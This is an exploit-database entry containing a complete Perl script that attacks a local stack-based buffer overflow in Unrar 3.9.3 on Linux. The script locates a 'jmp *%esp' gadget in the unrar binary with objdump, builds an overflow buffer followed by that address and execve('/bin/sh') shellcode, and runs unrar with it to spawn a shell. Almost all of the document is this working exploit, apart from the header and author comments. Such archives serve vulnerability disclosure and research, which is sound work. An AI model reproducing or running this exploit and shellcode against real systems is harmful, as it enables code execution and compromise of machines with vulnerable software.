Unrar 3.9.3 - Local Stack Overflow Exploit

2011-08-05T00:00:00
ID EDB-ID:17611
Type exploitdb
Reporter ZadYree
Modified 2011-08-05T00:00:00

Description

Unrar 3.9.3 - Local Stack Overflow Exploit. Local exploit for linux platform

                                        
                                            #!/usr/bin/perl
=head1	TITLE

Winrar <= v3.93 Local Stack-based Overflow exploit


=head2 DESCRIPTION

This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor.
It was not developped to bypass non-executing stack patches.
Have phun

=head2 AUTHORS

ZadYree ~~ 3LRVS Team - Low Level Languages Reversing Vxing Security


=head2 Tested ON

Linux Debian 6. May work on FreeBSD.

=head3 THANKS

kmkz
regol
hellpast
Hebiko
m_101
ZadYree

SNCF
The one who sent me that locked .rar
=cut
use 5.010;

# Shellcode: execve("/bin/sh") => http://www.shell-storm.org/shellcode/files/shellcode-752.php
use constant SHELLCODE => 	"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" .
				"\x73\x68\x68\x2f\x62\x69\x6e\x89" .
				"\xe3\xb0\x0b\xcd\x80";
use constant BUFF => ('-' . ('3lrvs' x 820));
##


$pname = "/usr/bin/unrar";

die "[-]File $pname does not exist!\012" unless (-e $pname);

say "[*]Looking for jmp *%esp gadget...";

for my $line(qx{objdump -D $pname | grep "ff e4"}) {
	$esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
}

say '[+]Jump to $esp found! (0x', $esp, ")\012[+]Now exploiting...";
sleep(1);

my @payload = ($pname, (BUFF . pack("V", hex($esp)) . SHELLCODE . "\012"));

exec(@payload);